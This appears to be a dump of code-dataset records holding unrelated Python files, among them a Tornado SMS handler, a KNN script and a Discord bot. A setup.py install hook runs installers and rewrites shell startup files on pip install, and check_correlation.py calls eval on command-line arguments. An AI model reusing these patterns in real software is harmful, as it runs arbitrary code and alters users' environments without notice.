phonenumbers.parse(number)\n except:\n # Get the country code to use for phone number parsing.\n if self.__class__.guess_country:\n country_code = self.get_argument('country', None)\n if country_code == None:\n country_code = self.get_user_country_by_ip()\n if country_code == None:\n code = self.get_browser_locale_code().replace('-', '_')\n parts = code.split('_')\n if len(parts) > 1: country_code = parts[1]\n if country_code == None: country_code = self.__class__.default_country\n country_code = country_code.upper()\n logging.debug(\"Final country code: \" + country_code)\n else:\n country_code = self.__class__.default_country\n # Parse the phone number into international notion.\n try:\n number_parsed = phonenumbers.parse(number, country_code)\n return number_parsed\n except:\n return False\n\n\n @gen.coroutine\n def limit_call(self, chash=None, amount=2, expire=10):\n \"\"\"\n Use this function to limit user requests. Returns True if this function\n was called less then 'amount' times in the last 'expire' seconds with\n the same value 'chash' and the same remote IP address or False\n otherwise.\n \"\"\"\n key = 'limit_call_' + chash + '_' + self.request.remote_ip\n redis = self.application.redis\n try:\n current_value = yield gen.Task(redis.get, key)\n except StreamClosedError:\n yield gen.Task(self.application.redis_reconnect)\n redis = self.application.redis\n current_value = yield gen.Task(redis.get, key)\n if current_value != None and int(current_value) >= amount:\n logging.info('Call Limitation acceded: ' + key)\n raise gen.Return(False)\n else:\n yield gen.Task(redis.incr, key)\n if not current_value: yield gen.Task(redis.expire, key, expire)\n raise gen.Return(True)\n\n\nclass DLRHandler(web.RequestHandler):\n \"\"\"\n Handles delivery receipts.\n \"\"\"\n def get(self):\n \"\"\"\n All delivery receipts will be send as HTTP-GET requests.\n \"\"\"\n # TODO: Parse request!\n logging.info('Received DLR. Not yet parsed though.')\n\n\n\nclass NumberValidationHandler(BaseHandler):\n \"\"\"\n Validates a phone number.\n \"\"\"\n limit_amount = 10\n limit_expires = 3600\n\n @gen.coroutine\n def get(self):\n \"\"\"\n Validates a phone number given as the query string parameter 'number'.\n\n If the phone number is not given in full international notion the\n parameter the country will be guesses if the class attribute guess_country\n is True. Guessing will be done as follows:\n 1. If a query string parameter 'country' is given as a country code\n (i.e. 'US', 'DE', ...) it will be used.\n 2. If no parameter country is given the country will be determined by\n the remote IP address.\n 3. Otherwise the country determined by the request header\n Accept-Language will be used.\n 4. As a fall-back the classes attribute default_country will be used.\n \"\"\"\n # Limit calls.\n if self.limit_amount and not (yield self.limit_call('number_validation', self.limit_amount, self.limit_expires)):\n #raise web.HTTPError(403, 'Number Validation request limit acceded')\n self.finish({'status': 'error',\n 'error': 'limit_acceded'})\n return\n\n # Decode request's query string parameters.\n number = self.get_argument('number', None)\n if not number:\n self.finish({'status': 'error',\n 'error': 'number_missing'})\n return\n logging.debug('Received number {} for validation'.format(number))\n numberobj = self.parse_phonenumber(number)\n if numberobj:\n number = phonenumbers.format_number(numberobj,\n phonenumbers.PhoneNumberFormat.INTERNATIONAL)\n else: number = False\n self.finish({'status': 'ok',\n 'number': number})\n\n\n\nclass SimpleMessageHandler(BaseHandler):\n message = 'This is an Example Message'\n sender = 'Put a sender title or number here'\n limit_amount = 10\n limit_expires = 3600\n\n @gen.coroutine\n def get(self):\n # Limit calls.\n if self.limit_amount and not (yield (self.limit_call('example_handler', self.limit_amount, self.limit_expires))):\n self.finish({'status': 'error',\n 'error': 'limit_acceded'})\n return\n\n # Get receiver's phone number as 'receiver' parameter.\n receiver = self.get_argument('receiver', None)\n if not receiver:\n self.finish({'status': 'error',\n 'error': 'receiver_missing'})\n return\n\n # Parse the given phone number.\n receiverobj = self.parse_phonenumber(receiver)\n if not receiverobj:\n self.finish({'status': 'error',\n 'error': 'receiver_validation'})\n return\n\n # Format numbers for processing and displaying.\n receiver_nice = phonenumbers.format_number(receiverobj,\n phonenumbers.PhoneNumberFormat.INTERNATIONAL)\n receiver = phonenumbers.format_number(receiverobj,\n phonenumbers.PhoneNumberFormat.E164)\n\n # Send message to receiver.\n result = yield gen.Task(self.application.nexmo_client.send_message,\n self.__class__.sender, receiver,\n self.__class__.message)\n\n # Process result.\n if result: self.finish({'status': 'ok',\n 'message': 'Message sent',\n 'number': receiver_nice})\n else: self.finish({'status': 'error',\n 'error': 'nexmo_error',\n 'message': 'Nexmo Service Error',\n 'number': receiver_nice})\n\n","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":10979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"206160316","text":"import sys, pandas, numpy;\n\nif len(sys.argv) > 0:\n\tdata = pandas.read_csv(sys.argv[1],header=None);\n\tcov = numpy.cov(m=data[1],y=data[2])\n\ts1 = eval(sys.argv[2]);\n\ts12 = eval(sys.argv[3]);\n\ts2 = eval(sys.argv[4]);\n\terr = eval(sys.argv[5]);\n\tmaxerr = numpy.max(numpy.abs([[s1,s12],[s12,s2]]-cov))\n\tif maxerr > err :\n\t\tprint(sys.argv[0],\": covariance error (%g) is too large, cov = %s\"%(maxerr,cov.flatten()))\n\t\tquit(1);\nelse:\n raise Exception(\"Syntax: python3 check_correlation.py \")\n","sub_path":"source/autotest/check_correlation.py","file_name":"check_correlation.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"571120347","text":"#!/usr/bin/env python3\n\n\"\"\" Assignment 3, Exercise 2, INF1340, Fall, 2015. DBMS\n\nThis module performs table operations on database tables\nimplemented as lists of lists. \"\"\"\n\n__author__ = \"Kei'ichiro Yamamoto, Albert Tai, Niel Chah\"\n__email__ = \"keiichiro.yamamoto@mail.utoronto.ca, albert.tai@mail.utoronto.ca, niel.chah@mail.utoronto.ca\"\n__copyright__ = \"2015 Kei'ichiro Yamamoto, Albert Tai, Niel Chah\"\n__license__ = \"MIT License\"\n\n\n#####################\n# HELPER FUNCTIONS ##\n#####################\n\ndef remove_duplicates(listoflists):\n \"\"\"\n This function removes duplicates from l, where l is a List of Lists.\n :param listoflists: a List\n \"\"\"\n\n d = {}\n result = []\n for row in listoflists:\n if tuple(row) not in d:\n result.append(row)\n d[tuple(row)] = True\n\n return result\n\n\nclass UnknownAttributeException(Exception):\n \"\"\"\n Raised when attempting set operations on a table\n that does not contain the named attribute\n \"\"\"\n pass\n\n\ndef selection(table1, function):\n \"\"\"\n Perform select operation on table t that satisfy condition f.\n\n Example:\n > R = [[\"A\", \"B\", \"C\"], [1, 2, 3], [4, 5, 6]]\n ># Define function f that returns True iff\n > # the last element in the row is greater than 3.\n > def f(row): row[-1] > 3\n > select(R, f)\n [[\"A\", \"B\", \"C\"], [4, 5, 6]]\n\n :param table1: this is the table that the function operate on\n :param function: this is a function that operates on the table\n\n :return: None if empty result(only has title row) or list\n \"\"\"\n result = []\n if not table1: # check if table 1 is empty if so return none\n return None\n result.append(table1[0]) # append the title row\n for row in table1[1:]: # cycle through everything except title row\n if function(row): # check if function wants the row\n result.append(row) # if so append it\n if len(result) == 1: # return None if only has title row\n return None\n else:\n return result # return table\n\n\ndef projection(table, attributes):\n \"\"\"\n Perform projection operation on table t\n using the attributes subset r.\n\n Example:\n > R = [[\"A\", \"B\", \"C\"], [1, 2, 3], [4, 5, 6]]\n > projection(R, [\"A\", \"C\"])\n [[\"A\", \"C\"], [1, 3], [4, 6]]\n\n :param table: this is the table that attribute columns will be found in\n :param attributes: this is a list of attributes that we are trying to find in table\n\n :return: None if empty result or list with just attribute columns from table\n \"\"\"\n\n positions_list = [None] * len(attributes) # allocate space for the list of positions\n position_counter = 0 # start the counter for position list at zero\n result = [] # initialize the result\n column_counter = 0 # counter for column header\n if not attributes: # checking if the attributes is empty\n raise UnknownAttributeException(\"Attributes is empty\")\n for item in attributes: # cycling through all attributes\n if item in table[0]: # check if attribute is in table title\n positions_list[position_counter] = table[0].index(item) # store the column row found into position list\n position_counter += 1 # increment the counter for positions\n else:\n raise UnknownAttributeException(item + \" cannot be found in table\") # raise exception if cannot be found\n for row in table: # cycle through the rows and append positions found\n for position in positions_list: # cycle through to find all positions of the attributes\n if positions_list.index(position) == 0: # check if first in the column\n result.append([row[position]])\n else:\n result[column_counter].append(row[position]) # otherwise append to the row in result\n column_counter += 1 # increment the column counter\n return result\n\n\ndef cross_product(t1, t2):\n \"\"\"\n Return the cross-product of tables t1 and t2.\n\n Example:\n > R1 = [[\"A\", \"B\"], [1,2], [3,4]]\n > R2 = [[\"C\", \"D\"], [5,6]]\n [[\"A\", \"B\", \"C\", \"D\"], [1, 2, 5, 6], [3, 4, 5, 6]]\n\n :param t1: First table that will be cross producted\n :param t2: Second table that will be matched to table 1\n\n :return: None if empty or list with result\n\n \"\"\"\n result = [] # initialize result table\n if not t1 or not t2: # check if either tables are empty\n return None\n if len(t2) == 1: # check if table 2 only has title row\n return None\n result += [t1[0] + t2[0]] # add the column titles together of table 1 and 2\n for t1counter in range (1, len(t1)): # Retrieve each row of table1 starting from after column labels\n for t2counter in range (1, len(t2)): # Retrieve each row of table2 starting from after column labels\n result += [t1[t1counter] + t2[t2counter]] # add it to the result table\n if not result: # if the result is empty\n return None\n return result\n\n\ndef filter_employees(row):\n \"\"\"\n Check if employee represented by row\n is AT LEAST 30 years old and makes\n MORE THAN 3500.\n :param row: A List in the format:\n [{Surname}, {FirstName}, {Age}, {Salary}]\n :return: True if the row satisfies the condition.\n \"\"\"\n return row[-2] >= 30 and row[-1] > 3500\n\n","sub_path":"exercise1.py","file_name":"exercise1.py","file_ext":"py","file_size_in_byte":5268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"97835335","text":"import json\n\nimport requests\n\nfrom extractors.result import Result\n\n\nHEADERS = {\n \"Host\": \"share.ippzone.com\",\n \"Connection\": \"keep-alive\",\n \"Content-Length\": \"45\",\n \"Origin\": \"http://share.ippzone.com\",\n \"User-Agent\":\n \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36\",\n \"Content-Type\": \"text/plain;charset=UTF-8\",\n \"Accept\": \"*/*\",\n \"Referer\": \"http://share.ippzone.com/\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Accept-Language\": \"zh-CN,zh;q=0.9\",\n}\n\nPOST_URL = \"http://share.ippzone.com/ppapi/share/fetch_content\"\n\n\ndef get(url: str) -> dict:\n result = Result()\n pid = int(url[33:]) # get pid\n post_data = {\n \"pid\": pid,\n \"type\": \"post\",\n }\n with requests.post(POST_URL, headers=HEADERS, data=json.dumps(post_data), timeout=20) as rep:\n if rep.status_code == 200:\n data = rep.json()\n\n # 下面处理很乱,主要对着返回数据看就很简单\n id = data.get('data').get('post').get('imgs')[0].get('id')\n if id:\n play_url = data.get('data').get('post').get('videos').get(str(id)).get('url')\n if not play_url:\n play_url = \"\"\n else:\n play_url = \"\"\n # --------------------------------------------------------------\n else:\n play_url = \"\"\n result.videoUrls.append(play_url)\n\n return result()\n\n\nif __name__ == \"__main__\":\n print(get(input(\"url: \")))","sub_path":"extractors/pipigaoxiao.py","file_name":"pipigaoxiao.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"473636645","text":"# Task 1\n\nimport pubchempy as pcp\nimport sys\nfrom rdkit import Chem\n\ncids_str = sys.argv\ncids = []\n\n# Convert input cid list to integer\nfor cid in cids_str[1:]:\n cid = int(cid)\n cids.append(cid)\n\n# Download file in SDF format\npcp.download('SDF', 'output.sdf', cids, 'cid', overwrite=True)\n\n# Download file in CSV format with some chosen features\npcp.download('CSV', 'output.csv', cids, operation='property/\\\nMolecularFormula,\\\nMolecularWeight,\\\nCanonicalSMILES,\\\nIUPACName,\\\nXLogP,\\\nExactMass,\\\nMonoisotopicMass,\\\nTPSA,\\\nComplexity,\\\nCharge,\\\nHBondDonorCount,\\\nHBondAcceptorCount,\\\nRotatableBondCount,\\\nHeavyAtomCount,\\\nIsomericSMILES', overwrite=True)\n\n# Convert from SDF to SMILES format\nsdf_file = Chem.SDMolSupplier('output.sdf')\nwith open('output.smi', 'w') as file:\n for mol in sdf_file:\n smiles = Chem.MolToSmiles(mol)\n file.write(\"{}\\n\".format(smiles))\n\n\n\n","sub_path":"getData.py","file_name":"getData.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"5751602","text":"#!/usr/bin/env python\n\n#Imports\nimport discord \nimport random\nfrom discord.ext import commands\n\nclass Game(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n @commands.command()\n async def rroulette(self, ctx, userid2: str): \n userid1 = ctx.author.id\n await ctx.send('You have been invited to play russian roulette ' + userid2 + \".\" + \" Do you accept? Y/N\")\n \n await ctx.send('Welcome to russian roulette.')\n @commands.command()\n async def rps(self, ctx, user_input: str): \n cpu_rps = [\"rock\", \"paper\", \"scissors\"]\n cpu_choice = random.choice(cpu_rps)\n user_choice = user_input.lower()\n if user_choice == cpu_choice:\n await ctx.send(\"You have tied with a bot. Shows you why you\\'re being replaced.\")\n else:\n if user_choice == \"rock\":\n if cpu_choice == \"paper\":\n await ctx.send(\"You won. Congratulations, it's a celebration, hopefully this doesn\\'t earn me a demonitization.\")\n if cpu_choice == \"scissors\":\n await ctx.send(\"Yikes. You lost. You feeling like pennies?\")\n if user_choice == \"paper\":\n if cpu_choice == \"rock\":\n await ctx.send(\"Yikes. You lost. You feeling like pennies?\")\n if cpu_choice == \"scissors\":\n await ctx.send(\"You won. Congratulations, it's a celebration, hopefully this doesn\\'t earn me a demonitization.\")\n if user_choice == \"scissors\":\n if cpu_choice == \"rock\":\n await ctx.send(\"Yikes. You lost. You feeling like pennies?\")\n if cpu_choice == \"paper\":\n await ctx.send(\"You won. Congratulations, it's a celebration, hopefully this doesn\\'t earn me a demonitization.\")\n @commands.command()\n async def magic8(self, ctx,): \n userid1 = ctx.author.id\n shake_numbers = [\"1\", \"2\", \"3\"]\n shake = random.choice(shake_numbers)\n await ctx.send('You shook the magic 8 ball ' + shake + \" times.\")\n if userid1 == 120195047470661632:\n await ctx.send('There is no hope left for you...')\n elif userid1 == 393160457508225036:\n await ctx.send('Anata wa pesuto kara yūtopia o kōchiku shi, tetsu no ken de sekai o shihai surudeshou. Senpai otōsan.')\n elif userid1 == 357953549738573835:\n await ctx.send('Egg.')\n elif userid1 == 180852994231762945:\n await ctx.send('Your only future is being pushed later by you... Stop procrastinating.')\n else:\n if shake == \"1\":\n await ctx.send('http://www.script-o-rama.com/movie_scripts/a1/bee-movie-script-transcript-seinfeld.html')\n if shake == \"2\":\n await ctx.send('I think you would love a homeowners insurance.')\n if shake == \"3\":\n await ctx.send('My man Mahmud. What you think you doin eh? Go get workin on those sunflowers my dude.')\n \n\n\n\ndef setup(bot):\n bot.add_cog(Game(bot))\n ","sub_path":"Shu Bot/modules/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":3080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"502176260","text":"import os, sys, pathlib, warnings, setuptools, subprocess, shutil\nfrom setuptools.command.install import install\n\n\nassert sys.version_info > (3, 5, 0), \"ERROR: Python version must be > 3.5!.\" # F-String.\nos.environ[\"CHOOSENIM_NO_ANALYTICS\"] = \"1\"\n\n\nclass X(install):\n\n def nimble_setup(self):\n # After choosenim, we check that Nimble is working,\n # as \"nimble\" or \"~/.nimble/bin/nimble\", then install nimpy and fusion\n result = False\n ext = \".exe\" if sys.platform.startswith(\"win\") else \"\"\n nimble_exe = 'nimble' + ext # Try \"nimble\"\n if subprocess.run(f\"{ nimble_exe } --version\", shell=True, timeout=99).returncode != 0:\n nimble_exe = pathlib.Path.home() / '.nimble' / 'bin' / f\"nimble{ext}\" # Try full path to \"nimble\"\n if subprocess.run(f\"{ nimble_exe } --version\", shell=True, timeout=99).returncode != 0:\n warnings.warn(f\"Nimble not found, tried '{ nimble_exe }' and 'nimble'\")\n nim_exe = shutil.which(f\"nim{ext}\") # Ask shutil for \"nim\"\n if nim_exe is not None:\n nim_exe = pathlib.Path(nim_exe)\n if subprocess.run(f\"{ nim_exe } --version\", shell=True, timeout=99).returncode != 0:\n nim_exe = pathlib.Path.home() / '.nimble' / 'bin' / f\"nim{ext}\" # Try full path to \"nim\"\n if subprocess.run(f\"{ nim_exe } --version\", shell=True, timeout=99).returncode != 0:\n warnings.warn(f\"Nim not found, tried '{ nim_exe }' and 'nim'\")\n if os.path.exists(nimble_exe):\n nimble_cmd = f\"{ nimble_exe } -y --noColor --nim:'{ nim_exe }'\"\n if subprocess.run(f\"{ nimble_cmd } refresh\", shell=True, timeout=999).returncode == 0:\n print(f\"OK\\t{ nimble_cmd } --verbose refresh\")\n if subprocess.run(f\"{ nimble_cmd } install nimpy\", shell=True, timeout=999).returncode == 0:\n print(f\"OK\\t{ nimble_cmd } install nimpy\")\n if subprocess.run(f\"{ nimble_cmd } install fusion\", shell=True, timeout=999).returncode == 0:\n print(f\"OK\\t{ nimble_cmd } install fusion\")\n result = True\n else:\n warnings.warn(f\"Failed to run '{ nimble_cmd } install fusion'\")\n else:\n warnings.warn(f\"Failed to run '{ nimble_cmd } install nimpy'\")\n else:\n warnings.warn(f\"Failed to run '{ nimble_cmd } refresh'\")\n else:\n warnings.warn(f\"File not found '{ nimble_exe }'\")\n return result\n\n def choosenim_setup(self):\n # Check for choosenim using \"choosenim --version\", to see if it is already installed,\n # if it is installed, run \"choosenim update self\" and \"choosenim update stable\",\n # if it is not installed run \"init.sh\" or \"choosenim --firstInstall\" to install choosenim.\n result = False\n choosenim_exe = \"choosenim.exe\" if sys.platform.startswith(\"win\") else \"choosenim\"\n if subprocess.run(f\"{ choosenim_exe } --version\", shell=True, timeout=999).returncode == 0:\n warnings.warn(f\"Choosenim is already installed and working on the system '{ choosenim_exe }'\")\n if subprocess.run(f\"{ choosenim_exe } update self\", shell=True, timeout=999).returncode != 0:\n warnings.warn(f\"Failed to run '{ choosenim_exe } update self'\") # Dont worry if \"update self\" fails.\n if subprocess.run(f\"{ choosenim_exe } update stable\", shell=True, timeout=999).returncode == 0:\n result = True\n else:\n warnings.warn(f\"Failed to run '{ choosenim_exe } update stable'\")\n else:\n choosenim_exe = pathlib.Path(__file__).parent / \"choosenim.exe\" if sys.platform.startswith(\"win\") else \"init.sh\"\n if os.path.exists(choosenim_exe):\n choosenim_cmd = f\"{ '' if sys.platform.startswith('win') else 'sh '}{ choosenim_exe } { ' --yes --verbose --noColor --firstInstall stable' if sys.platform.startswith('win') else ' -y' }\"\n if subprocess.run(choosenim_cmd, shell=True, timeout=999).returncode == 0:\n print(f\"OK\\t{ choosenim_cmd }\")\n if sys.platform.startswith('win'):\n if subprocess.run(f\"{ choosenim_exe } stable --firstInstall\", shell=True, timeout=999).returncode == 0:\n result = True\n else:\n result = True\n else:\n warnings.warn(f\"Failed to run '{ choosenim_cmd }'\")\n else:\n warnings.warn(f\"File not found '{ choosenim_exe }'\")\n shutil.rmtree(str(pathlib.Path.home() / \".choosenim\" / \"downloads\"), ignore_errors=True) # Clear download cache.\n return result\n\n def add_to_path(self):\n # On Linux add Nim to the PATH.\n if not sys.platform.startswith(\"win\"):\n new_path = f\"export PATH={ pathlib.Path.home() / '.nimble/bin' }:$PATH\"\n filename = pathlib.Path.home() / \".bashrc\"\n try:\n if filename.exists():\n found = False\n with open(filename, \"a\") as f:\n for line in f:\n if new_path == line:\n found = True\n if not found:\n f.write(new_path)\n else:\n with open(filename, \"w\") as f:\n f.write(new_path)\n print(f\"OK\\t{ filename }\")\n except:\n warnings.warn(f\"Failed to write file: {filename}\")\n filename = pathlib.Path.home() / \".profile\"\n try:\n if filename.exists():\n found = False\n with open(filename, \"a\") as f:\n for line in f:\n if new_path == line:\n found = True\n if not found:\n f.write(new_path)\n else:\n with open(filename, \"w\") as f:\n f.write(new_path)\n print(f\"OK\\t{ filename }\")\n except:\n warnings.warn(\"Failed to write file ~/.profile\")\n filename = pathlib.Path.home() / \".bash_profile\"\n try:\n if filename.exists():\n found = False\n with open(filename, \"a\") as f:\n for line in f:\n if new_path == line:\n found = True\n if not found:\n f.write(new_path)\n else:\n with open(filename, \"w\") as f:\n f.write(new_path)\n print(f\"OK\\t{ filename }\")\n except:\n warnings.warn(\"Failed to write file ~/.bash_profile\")\n filename = pathlib.Path.home() / \".zshrc\"\n try:\n if filename.exists():\n found = False\n with open(filename, \"a\") as f:\n for line in f:\n if new_path == line:\n found = True\n if not found:\n f.write(new_path)\n else:\n with open(filename, \"w\") as f:\n f.write(new_path)\n print(f\"OK\\t{ filename }\")\n except:\n warnings.warn(\"Failed to write file ~/.zshrc\")\n\n def run(self):\n install.run(self)\n # TODO: nimble has a new \"--noSSLCheck\" that can be added in the future.\n if self.choosenim_setup():\n if self.nimble_setup():\n self.add_to_path()\n else:\n warnings.warn(\"Failed to setup Nimble\")\n else:\n raise Exception(IOError, \"Failed to install choosenim\")\n\nsetuptools.setup(\n name = \"choosenim_install\",\n author = \"Juan_Carlos.nim\",\n cmdclass = {\"install\": X},\n author_email = \"UNKNOWN\",\n url = \"UNKNOWN\",\n)\n","sub_path":"dist/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":7057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"237625963","text":"\"\"\" Script to start a Flask web application \"\"\"\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\napp.url_map.strict_slashes = False\nport = 5000\nhost = '0.0.0.0'\n\n@app.route('/')\ndef index():\n ''' return the home page '''\n return render_template('login.html')\n\n@app.route('/index')\ndef login():\n ''' returns the login page '''\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run('0.0.0.0', 5000)\n","sub_path":"web_dynamic/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"471243974","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 17 16:04:19 2020\n\n@author: Lori\n\"\"\"\n\nimport sys\ngenpath = 'D:/Code'\nif genpath not in sys.path:\n sys.path.append(genpath)\n \nimport DataSciPy\nfrom src.knn.main_knn import *\nimport pandas as pd\nimport src.general_helper as genH\nimport scipy.optimize as opt\n\nfinal_db_epfl = pd.read_csv('data/processed/final_db_processed.csv')\n\n# Divide the features into classes on which Hammings distance should be computed\nencode_these_epfl = ['ring_number', \"exposure_type\", \"conc1_type\", \"species\",\n 'tripleBond', 'obs_duration_mean', 'doubleBond', 'alone_atom_number',\n 'class', 'tax_order', 'family', 'genus','exposure_type', 'conc1_type',\n 'species', 'obs_duration_mean', 'class', 'tax_order', 'family', 'genus']\n\ngroup_features_epfl = {0: ['ring_number', \"exposure_type\", \"conc1_type\", \"species\",\n 'tripleBond', 'obs_duration_mean', 'doubleBond', 'alone_atom_number',\n 'class', 'tax_order', 'family', 'genus','exposure_type', 'conc1_type',\n 'species', 'obs_duration_mean', 'class', 'tax_order', 'family', 'genus'],\n 1: ['atom_number', 'bonds_number', 'Mol', 'MorganDensity', 'LogP']}\n\nmetrics_epfl = {0:'hamming', 1:'euclidean'}\n\nalpha_epfl_bin = {0: 0.010826367338740546, 1: 1} # best for binary\nalpha_epfl_mult = {0: 0.017433288221999882, 1: 1} # best for multiclass\nn_neighbors_epfl = 1\nbest_leaf_epfl_bin = 80\nbest_leaf_epfl_mult = 60\n\nfinal_db_epfl_bin = genH.binary_score(final_db_epfl)\nfinal_db_epfl_mult = genH.multi_score(final_db_epfl)\n\n# Test one-hot encoding\ndummy = DataSciPy.Dataset()\ndummy.setup_data(X=final_db_epfl_bin.drop(columns=['test_cas','score']),\n y=final_db_epfl_bin.loc[:,['score']],\n split_test=0.3,\n seed=13)\ndummy.encode_categories(variables=encode_these_epfl, onehot=True)\n\n# Prepare binary run\ndummy = DataSciPy.Dataset()\ndummy.setup_data(X=final_db_epfl_bin.drop(columns=['test_cas','score']),\n y=final_db_epfl_bin.loc[:,['score']],\n split_test=0.3,\n seed=13)\ndummy.encode_categories(variables=encode_these_epfl)\nkep = Knn()\nkep.setup(dummy, group_features=group_features_epfl, alpha=alpha_epfl_bin)\nkep.compute_distance(metrics=metrics_epfl)\nkep.construct_distance_matrix(alpha=alpha_epfl_bin)\nacc = kep.run(n_neighbors=n_neighbors_epfl, leaf_size=best_leaf_epfl_bin) # should be 0.902857\n\n# Prepare multiclass run\ndummy = DataSciPy.Dataset()\ndummy.setup_data(X=final_db_epfl_mult.drop(columns=['test_cas','score']),\n y=final_db_epfl_mult.loc[:,['score']],\n split_test=0.3,\n seed=13)\ndummy.encode_categories(variables=encode_these_epfl)\nkep = Knn()\nkep.setup(dummy, group_features=group_features_epfl, alpha=alpha_epfl_mult)\nkep.compute_distance(metrics=metrics_epfl)\nkep.construct_distance_matrix(alpha=alpha_epfl_mult)\nacc = kep.run(n_neighbors=n_neighbors_epfl, leaf_size=best_leaf_epfl_mult) # should be 0.7401428","sub_path":"final_zip/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"311895959","text":"import json\nimport subprocess\n\nclass Measurement:\n def run_ping(self,hostnames = [], num_packets = 0, raw_ping_output_filename = \"\", aggregated_ping_output_filename =\"\"):\n for hostname in hostnames:\n ping_call = subprocess.Popen( [ 'ping', '-c ' + str(num_packets) , hostname ], stdout=subprocess.PIPE )\n ping_result = ping_call.communicate()[0]\n ping_result_array = ping_result.split(' ');\n print (ping_result)\n # retrieve rtts\n ping_time_float = []\n for word in ping_result_array:\n if \"time\" in word:\n print (word[5:])\n if not word[5:]:\n continue\n else:\n ping_time_float.append(float(word[5:]))\n print(ping_time_float)\n\n json_data = []\n json_data.append({\n hostname : ping_time_float\n })\n with open('my_sample_data.json', 'w') as outfile:\n json.dump(json_data, outfile);\n\n def create_json(self):\n data = []\n data.append({\n \"My\" : \"sample sample\"\n })\n\n data.append({\n \"My\" : \"sample sample sample\"\n })\n with open('my_sample_data.json', 'w') as outfile:\n json.dump(data, outfile);\n #\n # def plot_median_rtt_cdf():\n #\n # def plot_ping_cdf():\n\ninstance = Measurement();\ninstance.run_ping(['www.google.com'], 10);\n# instance.create_json();\n","sub_path":"projects/proj3_measurement/rtts.py","file_name":"rtts.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"577491981","text":"import os\nimport time\nimport random\nimport pickle\nimport numpy as np\nimport pandas as pd\nimport argparse\nimport yaml\nfrom model import IRMC_GC_Model, GCMCModel\nfrom utils import *\nfrom datetime import datetime\nimport torch\n\ndef fix_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.backends.cudnn.deterministic = True\nfix_seed(1234)\n\nparser = argparse.ArgumentParser(description='PMF')\nparser.add_argument('--gpus', default='0', help='gpus')\nparser.add_argument('--extra', action=\"store_true\", help='whether extra or inter')\nargs = parser.parse_args()\n\nconfig = yaml.safe_load(open(\"./datainfo.yaml\", 'r'))\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpus\ndevice = torch.device('cuda')\n\nLEARNING_RATE = 0.001\nDECAYING_FACTOR = 1.\nLAMBDA_REG = 0.05\nBATCH_SIZE_TRAIN = 1024\nBATCH_SIZE_TEST = 1024\nHIS_MAXLEN = 100\nHIS_SAMPLE_NUM = 20\nn_epochs = 1 # 500\n\nDATASET = 'ml-100k'\nSPLIT_WAY = 'threshold'\nTHRESHOLD = 30\nSUPP_RATIO = 0.8\nTRAINING_RATIO = 1\nEXTRA = args.extra\n\ndatadir = '../../../data/'\nn_user = config[DATASET]['n_user']\nn_item = config[DATASET]['n_item']\nn_rating = config[DATASET]['n_rating']\n\ntrain_set_supp, train_set_que, test_set_supp, test_set_que, user_supp_list, user_his_dic, edge_UI = \\\ngenerate_data(datadir=datadir, \n\t\t\t\tdataset=DATASET, \n\t\t\t\tsplit_way=SPLIT_WAY,\n\t\t\t\tsupp_ratio=SUPP_RATIO, \n\t\t\t\tthreshold=THRESHOLD,\n\t\t\t\ttraining_ratio=TRAINING_RATIO)\n\nuser_supp_num = len(user_supp_list)\nuser_que_num = n_user - user_supp_num\n\nif SPLIT_WAY == 'all':\n\ttrain_set_supp = torch.tensor(train_set_supp + train_set_que)\nelse:\n\ttrain_set_supp = torch.tensor(train_set_supp)\ntrain_set_que = torch.tensor(train_set_que)\ntest_set_supp = torch.tensor(test_set_supp)\ntest_set_que = torch.tensor(test_set_que)\nsupp_users = torch.tensor(user_supp_list, dtype = torch.long)\nedge_IU = []\t\nfor n in range(n_rating):\n\tedge_UI[n] = torch.tensor(edge_UI[n])\n\tedge_IU_n = edge_UI[n].transpose(1, 0).contiguous()\n\tedge_IU.append(edge_IU_n)\n\ndef sequence_adjust(seq):\n\tseq_new = seq\n\tif len(seq) <= 0:\n\t\tseq_new = [np.random.randint(0, n_item) for i in range(HIS_SAMPLE_NUM)]\n\tif len(seq) > HIS_MAXLEN:\n\t\trandom.shuffle(seq)\n\t\tseq_new = seq[:HIS_MAXLEN]\n\treturn seq_new\n\ndef train(model, optimizer, i, supp_or_que):\n\tmodel.train()\n\toptimizer.zero_grad()\n\t\n\tif supp_or_que == 'supp':\n\t\ttrain_set_supp_i = train_set_supp[i*BATCH_SIZE_TRAIN : (i+1)*BATCH_SIZE_TRAIN]\n\t\ttrain_set_supp_i_x = train_set_supp_i[:, :2].long().to(device)\n\t\ttrain_set_supp_i_y = train_set_supp_i[:, 2].float().to(device)\n\t\tedge_UI_i = [edge_UI[n][train_set_supp_i_x[:, 